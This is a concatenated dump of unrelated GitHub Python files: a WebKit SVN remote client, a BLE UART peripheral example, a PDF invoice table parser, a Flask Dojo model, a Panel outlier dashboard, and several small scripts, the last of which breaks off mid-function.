'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '\\n'\n ' \\n'\n '\\n',\n )\n if response.status_code not in [200, 207]:\n return []\n\n responses = xmltodict.parse(response.text)\n responses = responses.get('D:multistatus', responses).get('D:response', [])\n\n results = []\n for response in responses:\n candidate = response['D:href'].split('!svn/rvr/{}/{}/'.format(revision, category))[-1].rstrip('/')\n if not candidate:\n continue\n results.append(candidate)\n\n return results\n\n @property\n def branches(self):\n return [self.default_branch] + self.list('branches')\n\n def tags(self):\n return self.list('tags')\n\n def _cache_lock(self):\n import fasteners\n return fasteners.InterProcessLock(os.path.join(os.path.dirname(self._cache_path), 'cache.lock'))\n\n def _cache_revisions(self, branch=None):\n branch = branch or self.default_branch\n is_default_branch = branch == self.default_branch\n if branch not in self._metadata_cache:\n self._metadata_cache[branch] = [0] if is_default_branch else []\n pos = len(self._metadata_cache[branch])\n\n # If we aren't on the default branch, we will need the default branch to determine when\n # our branch intersects with the default branch.\n if not is_default_branch:\n self._cache_revisions(branch=self.default_branch)\n\n did_warn = False\n count = 0\n\n latest = self._latest()\n with requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}/{}'.format(\n self.url,\n latest,\n branch if is_default_branch or '/' in branch else 'branches/{}'.format(branch),\n ), stream=True,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '0\\n'\n '\\n'\n '\\n'.format(revision=latest),\n ) as response:\n if response.status_code != 200:\n raise self.Exception(\"Failed to construct branch history for '{}'\".format(branch))\n\n default_count = 0\n for line in response.iter_lines():\n match = self.DATA_RE.match(line)\n if not match or match.group('tag') != b'version-name':\n continue\n\n if not did_warn:\n count += 1\n if count > 1000:\n self.log('Caching commit data for {}, this will take a few minutes...'.format(branch))\n did_warn = True\n\n revision = int(match.group('content'))\n if pos > 0 and self._metadata_cache[branch][pos - 1] == revision:\n break\n if not is_default_branch:\n if revision in self._metadata_cache[self.default_branch]:\n # Only handle 2 sequential cross-branch commits\n if default_count > 2:\n break\n default_count += 1\n else:\n default_count = 0\n self._metadata_cache[branch].insert(pos, revision)\n\n if default_count:\n self._metadata_cache[branch] = self._metadata_cache[branch][default_count - 1:]\n if self._metadata_cache[self.default_branch][0] == [0]:\n self._metadata_cache['identifier'] = len(self._metadata_cache[branch])\n\n try:\n if not os.path.isdir(os.path.dirname(self._cache_path)):\n os.makedirs(os.path.dirname(self._cache_path))\n with self._cache_lock(), open(self._cache_path, 'w') as file:\n json.dump(self._metadata_cache, file, indent=4)\n except (IOError, OSError):\n self.log(\"Failed to write SVN cache to '{}'\".format(self._cache_path))\n\n return self._metadata_cache[branch]\n\n def _branch_for(self, revision):\n response = requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}'.format(self.url, revision),\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '{revision}\\n'\n '1\\n'\n '\\n'\n '\\n'.format(revision=revision),\n )\n\n # If we didn't get a valid answer from the remote, but we found a matching candidate, we return that.\n # This is a bit risky because there is a chance the branch we have cached is not the canonical branch\n # for a revision, but this is pretty unlikely because it would require the n + 1 level branch to be cached\n # but not the n level branch.\n if response.status_code != 200:\n raise self.Exception(\"Failed to retrieve branch for '{}'\".format(revision))\n\n partial = None\n items = xmltodict.parse(response.text)['S:log-report']['S:log-item']\n for group in (items.get('S:modified-path', []), items.get('S:added-path', []), items.get('S:deleted-path', [])):\n for item in group if isinstance(group, list) else [group]:\n if not partial:\n partial = item['#text']\n while not item['#text'].startswith(partial):\n partial = partial[:-1]\n\n candidate = partial.split('/')[2 if partial.startswith('/branches') else 1]\n\n # Tags are a unique case for SVN, because they're treated as branches in native SVN\n if candidate == 'tags':\n return partial[1:].rstrip('/')\n return candidate\n\n def _commit_count(self, revision=None, branch=None):\n branch = branch or self.default_branch\n\n if revision:\n if revision not in self._metadata_cache[branch]:\n raise self.Exception(\"Failed to find '{}' on '{}'\".format(revision, branch))\n return bisect.bisect_left(self._metadata_cache[branch], int(revision))\n if branch == self.default_branch:\n return len(self._metadata_cache[branch])\n return self._commit_count(revision=self._metadata_cache[branch][0], branch=self.default_branch)\n\n def commit(self, hash=None, revision=None, identifier=None, branch=None, tag=None, include_log=True, include_identifier=True):\n if hash:\n raise ValueError('SVN does not support Git hashes')\n\n parsed_branch_point = None\n if identifier is not None:\n if revision:\n raise ValueError('Cannot define both revision and identifier')\n if tag:\n raise ValueError('Cannot define both tag and identifier')\n\n parsed_branch_point, identifier, parsed_branch = Commit._parse_identifier(identifier, do_assert=True)\n if parsed_branch:\n if branch and branch != parsed_branch:\n raise ValueError(\n \"Caller passed both 'branch' and 'identifier', but specified different branches ({} and {})\".format(\n branch, parsed_branch,\n ),\n )\n branch = parsed_branch\n branch = branch or self.default_branch\n\n if branch == self.default_branch and parsed_branch_point:\n raise self.Exception('Cannot provide a branch point for a commit on the default branch')\n\n if not self._metadata_cache.get(branch, []) or identifier >= len(self._metadata_cache.get(branch, [])):\n if branch != self.default_branch:\n self._cache_revisions(branch=self.default_branch)\n self._cache_revisions(branch=branch)\n if identifier > len(self._metadata_cache.get(branch, [])):\n raise self.Exception('Identifier {} cannot be found on the specified branch in the current checkout'.format(identifier))\n\n if identifier <= 0:\n if branch == self.default_branch:\n raise self.Exception('Illegal negative identifier on the default branch')\n identifier = self._commit_count(branch=branch) + identifier\n if identifier < 0:\n raise self.Exception('Identifier does not exist on the specified branch')\n\n branch = self.default_branch\n\n revision = self._metadata_cache[branch][identifier]\n info = self.info(cached=True, branch=branch, revision=revision)\n branch = self._branch_for(revision)\n if not self._metadata_cache.get(branch, []) or identifier >= len(self._metadata_cache.get(branch, [])):\n self._cache_revisions(branch=branch)\n\n elif revision:\n if branch:\n raise ValueError('Cannot define both branch and revision')\n if tag:\n raise ValueError('Cannot define both tag and revision')\n revision = Commit._parse_revision(revision, do_assert=True)\n branch = self._branch_for(revision) or self.default_branch\n info = self.info(cached=True, branch=branch, revision=revision)\n\n else:\n if branch and tag:\n raise ValueError('Cannot define both branch and tag')\n\n branch = None if tag else branch or self.default_branch\n info = self.info(tag=tag) if tag else self.info(branch=branch)\n if not info:\n raise self.Exception(\"'{}' is not a recognized {}\".format(\n tag or branch,\n 'tag' if tag else 'branch',\n ))\n revision = int(info['Last Changed Rev'])\n if branch != self.default_branch:\n branch = self._branch_for(revision)\n\n date = datetime.strptime(info['Last Changed Date'], '%Y-%m-%d %H:%M:%S') if info.get('Last Changed Date') else None\n\n if include_identifier and not identifier:\n if branch != self.default_branch and revision > self._metadata_cache.get(self.default_branch, [0])[-1]:\n self._cache_revisions(branch=self.default_branch)\n if revision not in self._metadata_cache.get(branch, []):\n self._cache_revisions(branch=branch)\n identifier = self._commit_count(revision=revision, branch=branch)\n\n branch_point = None if not include_identifier or branch == self.default_branch else self._commit_count(branch=branch)\n if branch_point and parsed_branch_point and branch_point != parsed_branch_point:\n raise ValueError(\"Provided 'branch_point' does not match branch point of specified branch\")\n\n response = requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}'.format(self.url, revision),\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '{revision}\\n'\n '1\\n'\n '\\n'.format(revision=revision),\n ) if include_log else None\n\n if response and response.status_code == 200:\n response = xmltodict.parse(response.text)\n response = response.get('S:log-report', {}).get('S:log-item')\n\n name = response.get('D:creator-displayname')\n message = response.get('D:comment', None)\n\n else:\n if include_log:\n self.log('Failed to connect to remote, cannot compute commit message')\n message = None\n name = info.get('Last Changed Author')\n\n author = self.contributors.create(name, name) if name and '@' in name else self.contributors.create(name)\n\n return Commit(\n repository_id=self.id,\n revision=int(revision),\n branch=branch,\n identifier=identifier if include_identifier else None,\n branch_point=branch_point,\n timestamp=int(calendar.timegm(date.timetuple())) if date else None,\n author=author,\n message=message,\n )\n\n def _args_from_content(self, content, include_log=True):\n xml = xmltodict.parse(content)\n date = datetime.strptime(string_utils.decode(xml['S:log-item']['S:date']).split('.')[0], '%Y-%m-%dT%H:%M:%S')\n name = string_utils.decode(xml['S:log-item']['D:creator-displayname'])\n\n return dict(\n revision=int(xml['S:log-item']['D:version-name']),\n author=self.contributors.create(name, name) if name and '@' in name else self.contributors.create(name),\n timestamp=int(calendar.timegm(date.timetuple())),\n message=string_utils.decode(xml['S:log-item']['D:comment']) if include_log else None,\n )\n\n def commits(self, begin=None, end=None, include_log=True, include_identifier=True):\n begin, end = self._commit_range(begin=begin, end=end, include_identifier=include_identifier)\n previous = end\n\n content = b''\n with requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}/{}'.format(\n self.url,\n end.revision,\n end.branch if end.branch == self.default_branch or '/' in end.branch else 'branches/{}'.format(end.branch),\n ), stream=True,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{end}\\n'\n '{begin}\\n'\n '\\n'\n '\\n'.format(end=end.revision, begin=begin.revision),\n ) as response:\n if response.status_code != 200:\n raise self.Exception(\"Failed to construct branch history for '{}'\".format(branch))\n for line in response.iter_lines():\n if line == b'':\n content = line + b'\\n'\n else:\n content += line + b'\\n'\n if line != b'':\n continue\n\n args = self._args_from_content(content, include_log=include_log)\n\n branch_point = previous.branch_point if include_identifier else None\n identifier = previous.identifier if include_identifier else None\n if args['revision'] != previous.revision:\n identifier -= 1\n if not identifier:\n identifier = branch_point\n branch_point = None\n\n previous = Commit(\n repository_id=self.id,\n branch=end.branch if branch_point else self.default_branch,\n identifier=identifier,\n branch_point=branch_point,\n **args\n )\n yield previous\n content = b''\n","repo_name":"WebKit/WebKit","sub_path":"Tools/Scripts/libraries/webkitscmpy/webkitscmpy/remote/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":21478,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"23153285344","text":"# Blepy module\nimport blepy\n\n\nclass UARTPeripheral(blepy.Peripheral):\n # Using single-element list to reference immutable object 'tx_obj':\n tx_obj = [None]\n \n def __init__(self, adapter_address):\n services = [UARTService(True, self.tx_obj)]\n super().__init__(services, adapter_address, local_name='BLE UART')\n\n\nclass UARTService(blepy.Service):\n UART_SERVICE = '6E400001-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, primary, tx_obj):\n super().__init__(self.UART_SERVICE, primary) \n self.characteristics = [\n UARTCharacteristics.RX(tx_obj),\n UARTCharacteristics.TX(tx_obj)\n ]\n \n\nclass UARTCharacteristics:\n class RX(blepy.Characteristic):\n RX_CHARACTERISTIC = '6E400002-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, tx_obj):\n super().__init__(self.RX_CHARACTERISTIC)\n self.flags = ['write', 'write-without-response']\n self.write_callback = self.write\n self.tx_obj = tx_obj\n \n def write(self, value, options):\n print('Raw bytes:', value)\n print('With options:', options)\n print('Text value:', bytes(value).decode('utf-8'))\n self._update_tx(value)\n \n def _update_tx(self, value):\n if self.tx_obj[0]:\n print(\"Sending\")\n self.tx_obj[0].set_value(value)\n \n class TX(blepy.Characteristic): \n TX_CHARACTERISTIC = '6E400003-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, tx_obj):\n super().__init__(self.TX_CHARACTERISTIC)\n self.flags = ['notify']\n self.notify_callback = self.notify\n self.tx_obj = tx_obj\n \n def notify(self, notifying, characteristic):\n if notifying:\n self.tx_obj[0] = characteristic\n else:\n self.tx_obj[0] = None\n \n \ndef main(adapter_address):\n # Create peripheral\n uart = UARTPeripheral(adapter_address)\n \n # Publish peripheral and start event loop\n uart.publish()\n\n\nif __name__ == '__main__':\n main(blepy.Adapter.get_available_address()) \n","repo_name":"TrinaryLabs/blepy","sub_path":"examples/ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"7199600120","text":"\nimport camelot\nimport pandas as pd\nimport PyPDF2\nimport numpy as np\nimport glob\nfrom helpers.tools.table_utils import remove_empty_columns, remove_empty_rows, table_regex\nfrom pathlib import PureWindowsPath\nfrom db_custom import insert_item\ndef clean_table(table):\n df = table.df\n df = df.dropna(axis=1, how='all')\n df = df.dropna(axis=0, how='all')\n for column in df:\n df[column] = df[column].str.strip()\n #romove the last row\n df = df.drop(df.index[-1])\n #\n\n table.df=df\n #remove /n in the header\n\n for column in table.df:\n table.df[column] = table.df[column].str.replace('\\n','')\n \n #remove the first row\n table.df = table.df.drop(table.df.index[0])\n return table\n\n\ndef remove_table(table):\n table=table.df\n if table.empty:\n return None \n elif len(table.columns) == 1 or len(table.columns) == 2:\n return None\n elif table_regex(table,\"PART NUMBER\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n return table\n elif table_regex(table,\"PRODUCTNO\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n\n return table\n elif table_regex(table, \"PIEZA\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n return table\n elif table_regex(table, \"DESCRIPCION\"):\n table=table.replace('', np.nan).groupby(0).first().reset_index()\n\n return None\ndef getPages(filename):\n pdfFileObj = open(filename, 'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n return num_pages\n\ndef getTables(filename):\n #C:\\Users\\javie\\OneDrive\\Documentos\\easy\\pdfs\\javier.alejandro.flores.2@gmail.com\\2022-10-03_14-12-29_7.pdf\n filename = PureWindowsPath(filename)\n filename = str(filename)\n tables = camelot.read_pdf(filename, pages='1-end', flavor=\"stream\")\n pieces=pd.DataFrame()\n for table in tables:\n table = clean_table(table)\n table = remove_table(table)\n if table is not None:\n table = remove_empty_columns(table)\n table = remove_empty_rows(table)\n pieces = pd.concat([pieces,table])\n \n for index, row in pieces.iterrows():\n insert_item(Quantity_items=row[0],Mesure_items=row[1], Description_items=row[4],Cost_items=row[5])\n\n return pieces \n \n","repo_name":"javierIA/spaceFacturas","sub_path":"helpers/tools/ssc.py","file_name":"ssc.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71452959122","text":"import sys\nsys.stdin = open(\"dictionary.txt\", \"r\")\n\n\n\nfor TC in range(1, int(input())+1):\n N = int(input())\n case = [0]*N\n for i in range(N):\n case[i] = input()\n","repo_name":"dowookims/ProblemSolving","sub_path":"algospot/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10617963352","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app.models.ninja import Ninja\n\nclass Dojo:\n def __init__( self , data ):\n self.id = data['id']\n self.name = data['name']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.ninjas = []\n \n #dojo model create\n @classmethod\n def dojo_save( cls , data ):\n query = \"\"\"\n INSERT INTO dojos \n (name) \n VALUES (%(name)s);\n \"\"\"\n result = connectToMySQL('dojo_ninja').query_db(query, data) \n return result\n\n #dojo model read\n @classmethod\n def get_dojos(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL('dojo_ninja').query_db(query)\n dojos = []\n for dojo in results:\n dojos.append( cls(dojo) )\n return dojos\n\n @classmethod\n def get_a_dojo_with_ninjas(cls, data):\n query = \"\"\"\n SELECT * FROM dojos\n LEFT JOIN ninjas\n ON dojos.id = ninjas.dojo_id\n WHERE dojos.id = %(id)s\n ;\"\"\"\n all_results = connectToMySQL('dojo_ninja').query_db(query, data)\n print(\"****************\", all_results)\n the_dojos_ninjas = cls(all_results[0])\n for info in all_results:\n new_ninja ={\n \"id\" : info[\"ninjas.id\"],\n \"first_name\" : info[\"first_name\"],\n \"last_name\" : info[\"last_name\"],\n \"age\" : info[\"age\"],\n \"created_at\" : [\"ninjas.created_at\"],\n \"updated_at\" : [\"ninjas.updated_at\"]\n }\n the_dojos_ninjas.ninjas.append(Ninja(new_ninja))\n return the_dojos_ninjas\n \n #dojo model update\n #dojo model delete","repo_name":"TracyMDoyle/dojos_and_ninjas","sub_path":"flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38135969172","text":"'''input\n2\n1 5 10 3\n1 2 2 2\n'''\n\ndef gcd (a, b):\n if not a:\n return b\n return gcd (b % a, a)\n \nfor _ in range (int (input())):\n a, b, c, d = map (int, input().split())\n g = gcd (c, d)\n print (min ((a - b) % g, (b - a) % g)) ","repo_name":"enrro/TC2025-programacion-avanzada","sub_path":"proyectos/proyecto3/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72285791761","text":"#!python3\n\nimport os\nimport sys\nimport logging\n\n# Given an environment variable and default value, fetch the variable from the environment\n# if it exists. If it does not exist, return the default value. If no default value is\n# define, then return an error. This allows us to have a default value when possible, or if\n# not possible, give an error.\ndef get_env(name, default=None):\n logging.info('Fetching ENV: ' + name)\n if name in os.environ:\n return os.environ[name]\n\n if default is not None:\n return default\n\n logging.error('Error: Missing required environment variable ' + name)\n sys.exit(1)\n\n# Set the logging level to be used based on a user input, allowing for consistent logging\n# from any of the scripts utilized.\ndef configure_logging(log_level):\n root = logging.getLogger()\n handler = logging.StreamHandler(sys.stdout)\n if log_level == 'debug':\n root.setLevel(level=logging.DEBUG)\n handler.setLevel(logging.DEBUG)\n elif log_level == 'info':\n root.setLevel(level=logging.INFO)\n handler.setLevel(logging.INFO)\n elif log_level == 'warning':\n root.setLevel(level=logging.WARNING)\n handler.setLevel(logging.WARNING)\n elif log_level == 'error':\n root.setLevel(level=logging.ERROR)\n handler.setLevel(logging.ERROR)\n elif log_level == 'critical':\n root.setLevel(level=logging.CRITICAL)\n handler.setLevel(logging.CRITICAL)\n else:\n print('Unknown log level, defaulting to INFO')\n root.setLevel(level=logging.INFO)\n handler.setLevel(logging.INFO)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n","repo_name":"alexloney/vaultwarden_backup","sub_path":"scripts/include.py","file_name":"include.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30893300191","text":"import panel as pn\nimport hvplot.pandas\nimport pandas as pd\nimport numpy as np\n\nfrom js import console\nfrom pyodide_http import patch_all\npatch_all()\n\npn.extension(design='material')\n\ncsv_file = (\"https://raw.githubusercontent.com/holoviz/panel/main/examples/assets/occupancy.csv\")\ndata = pd.read_csv(csv_file, parse_dates=[\"date\"], index_col=\"date\")\nconsole.log(\"Downloaded data\")\n\n# Panel Widgets\nvariable_widget = pn.widgets.Select(name=\"variable\", value=\"Temperature\", options=list(data.columns))\nwindow_widget = pn.widgets.IntSlider(name=\"window\", value=30, start=1, end=60)\nsigma_widget = pn.widgets.IntSlider(name=\"sigma\", value=10, start=0, end=20)\nconsole.log(\"Set up widgets!\")\n\n# Interactive hvplot pipeline\n## Compute the outliers\ndata = data.interactive()\navg = data[variable_widget].rolling(window=window_widget).mean()\nresidual = data[variable_widget] - avg\nstd = residual.rolling(window=window_widget).std()\noutliers = np.abs(residual) > std * sigma_widget\n\n## Plot the average variable line together with the outliers as points\npipeline = (\n avg.hvplot(height=300, width=400, color=\"blue\", legend=False)\n * avg[outliers].hvplot.scatter(color=\"orange\", padding=0.1, legend=False)\n)\n\n# Compute the number of outliers\ncount = outliers.pipe(\n lambda s: pn.indicators.Number(\n name='Outliers count', value=s.sum(),\n colors=[(10, 'green'), (30, 'gold'), (np.Inf, 'red')]\n )\n)\n\n# Servable App\npn.Column(pipeline.widgets(), pn.Row(count.output(), pipeline.output())).servable(target='panel')\n","repo_name":"pyscript/examples","sub_path":"panel_with_hvplot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38907956294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 18 13:48:05 2022\n\n@author: Yapicilab\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport glob\nimport os\nimport math\n\nos.chdir('G:\\\\My Drive\\\\local_search\\\\ZT')\nsome_df={}\ntimelist=sorted(os.listdir())\ntimelist.remove('desktop.ini')\nfor timing in timelist:\n fnames = sorted(glob.glob(timing+'/'+'*.csv'))\n inst_vel_all=[]\n for u in fnames: #goes thru files in the folder.\n df=pd.read_csv(u, header=None)\n df=df.dropna(axis=1, how='all')\n if(df.shape[1]==10):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2', 'Fx3', 'Fy3','Fx4','Fy4']\n elif(df.shape[1]==8):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2', 'Fx3', 'Fy3']\n elif(df.shape[1]==6):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1', 'Fx2', 'Fy2']\n elif(df.shape[1]==4):\n data_header = ['Time', 'Latency', 'Fx1', 'Fy1']\n df.columns=data_header\n latency=list(df['Latency'])\n latency[0]=0\n df['Time']=df['Time']-120\n for i in range(2,len(data_header),2):\n x_coord=list(df[data_header[i]])\n y_coord=list(df[data_header[i+1]])\n time=list(df['Time'])\n jumps=[]\n inst_vel=np.zeros_like(x_coord)\n for j in range(0,len(x_coord)-1,1):\n inst_vel[j]=np.sqrt((x_coord[j+1]-x_coord[j])**2+(y_coord[j+1]-y_coord[j])**2)/latency[j+1]\n \n # median_inst_vel=np.median(inst_vel)\n inst_vel_all.extend(inst_vel)\n newlist = [x for x in inst_vel_all if np.isnan(x) == False]\n some_df[timing]=newlist\n\n# some_df=some_df.dropna(axis=0)\nlabels, data2 = [*zip(*some_df.items())] # 'transpose' items to parallel key, value lists\nfig, ax = plt.subplots()\n\nax.boxplot(data2, showfliers=False)\n# ax=sns.stripplot(data2, size=2)\nax.set_xticklabels(labels)\nplt.show()\n","repo_name":"namanagrawal97/local_search","sub_path":"ZT time analysis.py","file_name":"ZT time analysis.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14447764687","text":"from pymongo import MongoClient\nimport traceback\n\nclass DB:\n def __init__(self, db_port = 27017, db = 'test', db_host = 'localhost', db_collection = 'company_details3'):\n self.HOST = db_host\n self.COLLECTION = db_collection\n self.PORT = db_port\n self.DATABASE = db\n\n def insert_details(self, data):\n try:\n client = MongoClient(self.HOST, self.PORT)\n db = client[self.DATABASE]\n db[self.COLLECTION].remove({'website':data['website']})\n db[self.COLLECTION].insert(data)\n except:\n traceback.print_exc()\n return False\n return True","repo_name":"prabhat27/CompanyDetails","sub_path":"db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19940343873","text":"from os import walk\r\nimport pygame\r\n\r\n\r\n#Convert image file into the list\r\ndef import_folder(path):\r\n export_file = []\r\n\r\n for _,__,image_files in walk(path):\r\n for image in image_files:\r\n full_path = path + '/' + image\r\n image_surface = pygame.image.load(full_path).convert_alpha()\r\n export_file.append(image_surface)\r\n\r\n return export_file\r\n","repo_name":"deceimo/mario-game","sub_path":"mario/code/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16927560107","text":"#\n# mains.py : containing the main menu system\n#\n\nfrom functionsB import *\nfrom functionsC import *\nfrom functionsD import * \nfrom DSATrees import *\n#from DSALinkedList import *\n#from DSAQueue import *\nimport math\nimport re\n#import string\n#import pandas as pd\n\n# Opening File for Task1 and Task2 ===========================================================\n\nwith open('HouseCandidatesDownload-20499.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\ndata = []\nfor line in csvdata:\n splitline = line.split(',')\n data.append(splitline)\n\n# Opening File for Task3 ====================================================================\n\ndef openFile(filename): \n \"\"\"Read csv and replace dodgy stuff.\n\n Keyword arguments:\n filename -- csv file name\n \"\"\"\n find = '\"Shooters, Fishers and Farmers\"'\n replace = 'Shooters Fishers and Farmers'\n datalist = []\n with open(filename) as fileobj1:\n csvdata1 = fileobj1.read().splitlines()\n for line in csvdata1:\n line = str.replace(line, find, replace)\n splitline = line.split(',')\n datalist.append(splitline)\n return datalist\n\nact = openFile(\"PrefbyPP-ACT.csv\")\nnsw = openFile(\"PrefbyPP-NSW.csv\")\nvic = openFile(\"PrefbyPP-VIC.csv\")\nqld = openFile(\"PrefbyPP-QLD.csv\")\ntas = openFile(\"PrefbyPP-TAS.csv\")\nwa = openFile(\"PrefbyPP-WA.csv\")\nsa = openFile(\"PrefbyPP-SA.csv\")\nnt = openFile(\"PrefbyPP-NT.csv\")\n\n# Opening File for Task4 =====================================================================\n\nwith open('AirportDist1.0.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\nairport = []\nfor line in csvdata:\n splitline = line.split(',')\n airport.append(splitline)\n\nwith open('ElectDist1.1.csv') as fileobj:\n csvdata = fileobj.read().splitlines()\nelect = []\nfor line in csvdata:\n splitline = line.split(',')\n elect.append(splitline)\n\n\nprint(\"\\nFILE OPENED\\n\")\n\n#Non-TaskSpecific Functions ===================================================================\n\n\ndef mainMenu():\n \"\"\"Display of main options.\"\"\"\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\t\\t\\t MAIN MENU\")\n print(\"----------------------------------------------------------------\")\n print(\"\\nWhat would you like to do today?\")\n print(\"\\tA. List of nominee\")\n print(\"\\tB. Nominee search\")\n print(\"\\tC. List by margin\")\n print(\"\\tD. Itinerary by margin\")\n print(\"\\t-- Press Enter to quit\")\n\ndef displayState():\n \"\"\"Displays all the states\"\"\"\n print(\"\\nWhat state would you like?\")\n print(\"A. ACT\\t\\t E. TAS\")\n print(\"B. NSW\\t\\t F. WA\")\n print(\"C. VIC\\t\\t G. SA\")\n print(\"D. QLD\\t\\t H. NT\")\n\ndef displayParty():\n \"\"\"Displays all the parties.\"\"\"\n print(\"\\nWhich party would you like?\")\n print(\"A. Liberal\\t\\t C. The Greens\")\n print(\"B. Labor\\t\\t D. The Nationals\")\n\ndef takeFilter():\n \"\"\"Takes user's filter option between state or party.\"\"\"\n print(\"\\nFilter by:\")\n print(\"A. State\\t\\t B. Party\")\n filterOpt = input(\"Selected filter is (A/B): \")\n list1 = [\"A\", \"B\"]\n while filterOpt.upper() not in list1:\n filterOpt = input(\"Selected filter is (A/B): \")\n return filterOpt.upper()\n\ndef ask_toWriteFile():\n writeFile = input(\"\\nWould you like to save report to a file? (Y/N) \")\n list1 = [\"Y\", \"N\"]\n while writeFile.upper() not in list1:\n writeFile = input(\"Would you like to save report to a file? (Y/N) \")\n if writeFile.upper() == \"Y\":\n ret = True\n elif writeFile.upper() == \"N\":\n ret = False\n return ret\n\n\n#Function for option A. LIST OF CANDIDATES ================================================\n\n\ndef AfilterMenu():\n \"\"\"Display of filter options, take order option and insert to tree.\"\"\"\n filterOpt = takeFilter()\n if filterOpt.upper() == \"A\":\n displayState()\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n list1 = [\"ACT\", \"NSW\", \"VIC\", \"QLD\", \"TAS\", \"WA\", \"SA\", \"NT\"]\n while stateOpt.upper() not in list1:\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n orderOpt = AorderMenu()\n insertTreeSTATE(stateOpt.upper(), orderOpt.upper())\n elif filterOpt.upper() == \"B\":\n displayParty()\n partyOpt = input(\"Selected party is (A-D): \")\n list1 = [\"A\", \"B\", \"C\", \"D\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A-D): \")\n insertTreePARTY(partyOpt.upper())\t#argument only filter, order is only A\n \n\ndef AorderMenu():\n \"\"\"Display of order (sort by) options.\"\"\"\n print(\"\\nOrder by:\")\n print(\"A. Surname\\nB. Party\")\n orderOpt = input(\"Selected order is (A-B): \")\n list1 = [\"A\", \"B\"]\n while orderOpt.upper() not in list1:\n orderOpt = input(\"Selected order is (A-B): \")\n return orderOpt.upper()\n\n\ndef insertTreeSTATE(state, order):\n \"\"\"Inserting items by state to a Binary Tree and preorder display.\n\n Keyword arguments:\n state -- chosen state\n order -- chosen order (sort by)\n \"\"\"\n if order == \"A\":\n #order by surname this will be the key value for BT\n i = 0\n size = 0\n BT = DSABinaryTrees()\n while i != len(data):\n if data[i][0] == state: #row i col 0 (stateAb)\n inKey = data[i][6]+\" \"+data[i][7]\n BT.insert(inKey, data[i][4]) #key=inKey, value=PartyName\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\nList of Candidates, filtered by State and ordered by Surname\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n\n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n 